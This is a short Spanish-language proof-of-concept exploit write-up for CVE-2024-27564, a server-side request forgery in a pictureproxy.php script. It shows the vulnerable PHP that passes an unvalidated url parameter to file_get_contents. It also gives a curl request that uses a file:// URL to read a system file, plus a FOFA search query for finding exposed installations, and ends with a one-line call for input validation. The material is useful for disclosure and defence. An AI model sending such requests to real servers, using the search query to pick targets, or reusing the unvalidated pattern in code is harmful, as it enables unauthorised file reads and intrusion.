
Exploit de prueba de concepto para CVE-2024-27564, una vulnerabilidad de falsificación de solicitud del lado del servidor (SSRF) en pictureproxy.php que permite a atacantes remotos no autenticados inyectar URLs arbitrarias a través del parámetro url.
Una vulnerabilidad en pictureproxy.php permite a atacantes remotos realizar peticiones arbitrarias inyectando URLs en el parámetro url. Esta vulnerabilidad SSRF puede ser explotada sin autenticación, lo que la hace particularmente peligrosa.
El código vulnerable se encuentra en el archivo pictureproxy.php. El problema ocurre porque la función no valida adecuadamente el parámetro url. La variable $_GET['url'] se pasa a la función file_get_contents(), que obtiene contenido de la URL especificada. Esto puede llevar a SSRF.
<?php
if (isset($_GET['url'])) {
$image = file_get_contents($_GET['url']);
header("Content-type: image/jpeg");
echo $image;
} else {
echo "Invalid request";
}
Solicitud Curl:
curl -i -s -k http://127.0.0.1/pictureproxy.php?url=file:///etc/password
FOFA= "title="ChatGPT个人专用版""
Se necesita una gestión adecuada de la validación de entrada.